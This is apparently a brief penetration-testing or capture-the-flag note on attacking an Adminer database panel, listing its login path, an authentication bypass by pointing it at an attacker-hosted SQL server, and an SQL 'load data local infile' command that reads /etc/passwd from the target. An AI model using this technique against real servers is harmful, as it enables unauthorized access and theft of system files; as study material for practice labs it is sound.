adminer.php
Login Page
/adminer.php
Interesting Paths
/var/www/html/index.php
Auth Bypass and LFI
Host own SQL server, connect via target to bypass login
Check PHPinfo
open_basedir /var/www/html => can only read files in this dir.
# LFI via SQL
load data local infile "/etc/passwd"
into table admirer.pwn
fields terminated by "\n";
Last updated
Was this helpful?